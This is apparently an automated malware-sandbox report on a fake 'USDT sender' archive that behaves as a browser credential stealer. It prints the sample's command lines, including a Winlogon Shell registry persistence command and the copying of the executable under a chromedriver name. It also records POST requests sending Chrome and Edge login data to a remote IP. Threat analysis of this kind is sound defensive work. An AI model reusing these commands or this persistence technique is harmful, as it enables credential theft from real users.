File name:

FLASH+USDT+SENDER+CR.rar

Full analysis: https://app.any.run/tasks/ac896cbe-6384-47a7-a573-1228d414d5b5
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: February 16, 2025, 16:27:05
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
stealer
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

B4805F91624F3BD6FE51D78BE1F651DA

SHA1:

267AA0D5098778CED4176BB37A6AA6DAF1558A46

SHA256:

9DBA52730CCCB2ED9B0745A518E1B9F379E6FCA84AAE5412539387788CFF2EE0

SSDEEP:

49152:xpicypSa55gEnDA/feW1SOFAHItVi2wOzMyk9cM240e+5i8hkaTQVjolvPS2gaVZ:xryV5jDA/NrscxwOzsj24Jd8h8Sl3S2T

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 1544)

    • Changes the login/logoff helper path in the registry

      • reg.exe (PID: 4264)

    • Steals credentials from Web Browsers

      • MSBuild.exe (PID: 6328)

    • Actions looks like stealing of personal data

      • MSBuild.exe (PID: 6328)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 1544)

    • Hides command output

      • cmd.exe (PID: 2420)
      • cmd.exe (PID: 4520)

    • Starts CMD.EXE for commands execution

      • FLASH USDT SENDER [CRAX.PRO].exe (PID: 6240)

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 2420)
      • cmd.exe (PID: 4520)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2420)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 4520)

    • The executable file from the user directory is run by the CMD process

      • chromedriver.exe (PID: 5008)

    • Connects to the server without a host name

      • MSBuild.exe (PID: 6328)

  • INFO

    • Checks supported languages

      • FLASH USDT SENDER [CRAX.PRO].exe (PID: 6240)
      • chromedriver.exe (PID: 5008)
      • MSBuild.exe (PID: 6328)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 1544)

    • Reads the computer name

      • FLASH USDT SENDER [CRAX.PRO].exe (PID: 6240)
      • chromedriver.exe (PID: 5008)
      • MSBuild.exe (PID: 6328)

    • Reads the machine GUID from the registry

      • FLASH USDT SENDER [CRAX.PRO].exe (PID: 6240)
      • MSBuild.exe (PID: 6328)
      • chromedriver.exe (PID: 5008)

    • Disables trace logs

      • MSBuild.exe (PID: 6328)

    • Creates files in the program directory

      • MSBuild.exe (PID: 6328)

    • Checks proxy server information

      • MSBuild.exe (PID: 6328)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)

EXIF

ZIP

FileVersion: RAR v5
CompressedSize: 1151648
UncompressedSize: 1562624
OperatingSystem: Win32
ArchivedFileName: FLASH+USDT+SENDER+CR/FLASH USDT SENDER [CRAX.PRO].exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
140
Monitored processes
12
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winrar.exe flash usdt sender [crax.pro].exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs cmd.exe conhost.exe no specs ping.exe no specs reg.exe ping.exe no specs chromedriver.exe no specs msbuild.exe

Process information

PID
CMD
Path
Indicators
Parent process
1544"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\FLASH+USDT+SENDER+CR.rarC:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1580ping 127.0.0.1 -n 13 C:\Windows\SysWOW64\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ws2_32.dll
2092ping 127.0.0.1 -n 7 C:\Windows\SysWOW64\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ws2_32.dll
2324\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2420"cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe,"C:\Windows\SysWOW64\cmd.exeFLASH USDT SENDER [CRAX.PRO].exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
3420ping 127.0.0.1 -n 13 C:\Windows\SysWOW64\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ws2_32.dll
4264REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe,"C:\Windows\SysWOW64\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
4520"cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\Users\admin\AppData\Local\Temp\Rar$EXa1544.4635\FLASH+USDT+SENDER+CR\FLASH USDT SENDER [CRAX.PRO].exe" "C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe" && ping 127.0.0.1 -n 13 > nul && "C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe"C:\Windows\SysWOW64\cmd.exe
FLASH USDT SENDER [CRAX.PRO].exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
4628\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5008"C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe"C:\Users\admin\Documents\Chrome\Driver\chromedriver.execmd.exe
User:
admin
Company:
6I?5E7CAGG@9IA7872G9F55
Integrity Level:
MEDIUM
Description:
>@GC?7J5EEJ;I55CCB=C
Exit code:
0
Version:
8.12.16.21
Modules
Images
c:\users\admin\documents\chrome\driver\chromedriver.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
Total events
2 984
Read events
2 961
Write events
23
Delete events
0

Modification events

(PID) Process:(1544) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(1544) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(1544) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(1544) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\FLASH+USDT+SENDER+CR.rar
(PID) Process:(1544) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(1544) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(1544) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(1544) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(4264) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Operation:writeName:Shell
Value:
explorer.exe,C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe,
(PID) Process:(6328) MSBuild.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
2
Suspicious files
7
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
4520cmd.exeC:\Users\admin\Documents\Chrome\Driver\chromedriver.exeexecutable
MD5:09B1C84716B5B142ED3C214011648C7D
SHA256:7C96FBC4242E3E3249988E58D3C8917849998B6C221A5F32847F44F48347C283
6328MSBuild.exeC:\Users\admin\Music\Kryptos\tempWD_Chromebinary
MD5:F6C33AC5E1032A0873BE7BFC65169287
SHA256:D97895CEDED32E33D57BDCACCDBE144E58AA87AF4D2F8855D630286CE30A8D83
6328MSBuild.exeC:\Users\admin\Music\Kryptos\tempLD_Edgebinary
MD5:29A644B1F0D96166A05602FE27B3F4AD
SHA256:BF96902FEB97E990A471492F78EE8386BCF430D66BDAEFDEAFBF912C8CF7CE46
6328MSBuild.exeC:\Users\admin\Music\Kryptos\tempWD_Edgebinary
MD5:95FFD778940E6DF4846B0B12C8DD5821
SHA256:21A2DEBD389DB456465DFEFFDB15F0AF3FBC46F007CBA67513A13EB10D14E94F
6328MSBuild.exeC:\Users\admin\Music\Kryptos.zipcompressed
MD5:76CDB2BAD9582D23C1F6F4D868218D6C
SHA256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
1544WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa1544.4635\FLASH+USDT+SENDER+CR\FLASH USDT SENDER [CRAX.PRO].exeexecutable
MD5:09B1C84716B5B142ED3C214011648C7D
SHA256:7C96FBC4242E3E3249988E58D3C8917849998B6C221A5F32847F44F48347C283
6328MSBuild.exeC:\Users\admin\Music\Kryptos\tempLS_Edgebinary
MD5:DFFC82B8D23613E62A20204028CEF32F
SHA256:114690F0417A9A6B079EA8D0534F095B04467809DCA929EB0983059E1C60FB6C
6328MSBuild.exeC:\Users\admin\Music\Kryptos\tempLD_Chromebinary
MD5:A45465CDCDC6CB30C8906F3DA4EC114C
SHA256:4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
6328MSBuild.exeC:\Users\admin\Music\Kryptos\tempLS_Chromebinary
MD5:414B7F9E82EE13FB08D39D366B2FBEC8
SHA256:6F9AD831D38FF839C0EE3593CC5452D7BE31D9725EE81D3E7AD20E4D91736971
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
25
DNS requests
13
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7012
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7012
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1176
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6424
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6328
MSBuild.exe
POST
200
185.225.226.125:80
http://185.225.226.125/backend/api.php
unknown
unknown
6328
MSBuild.exe
POST
200
185.225.226.125:80
http://185.225.226.125/backend/recovery.php?wfound=0&cfound=0&bfound=0
unknown
unknown
6328
MSBuild.exe
POST
200
185.225.226.125:80
http://185.225.226.125/backend/api.php
unknown
unknown
6328
MSBuild.exe
POST
200
185.225.226.125:80
http://185.225.226.125/backend/api.php
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:137
whitelisted
1176
svchost.exe
40.126.32.134:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1176
svchost.exe
184.30.131.245:80
AKAMAI-AS
US
unknown
1076
svchost.exe
2.19.106.8:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted
5988
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
7012
SIHClient.exe
4.175.87.197:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7012
SIHClient.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
7012
SIHClient.exe
20.242.39.171:443
fe3cr.delivery.mp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.126.32.134
  • 40.126.32.140
  • 20.190.160.17
  • 20.190.160.128
  • 20.190.160.14
  • 20.190.160.67
  • 40.126.32.136
  • 40.126.32.68
whitelisted
go.microsoft.com
  • 2.19.106.8
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
fd.api.iris.microsoft.com
  • 20.31.169.57
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.19
whitelisted

Threats

PID
Process
Class
Message
6328
MSBuild.exe
Misc activity
SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
Process
Message
MSBuild.exe
{"message":"Success - First Connection"}
MSBuild.exe
[RECOVERY] found Chrome Login Data and Local State files.
MSBuild.exe
[RECOVERY] found Edge Login Data and Local State files.
MSBuild.exe
Server Response: {"message":"Recovery Successful."}
MSBuild.exe
{"message":"Success - Updated Last Seen"}
MSBuild.exe
{"message":"Success - Updated Last Seen"}
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
FLASH+USDT+SENDER+CR.rar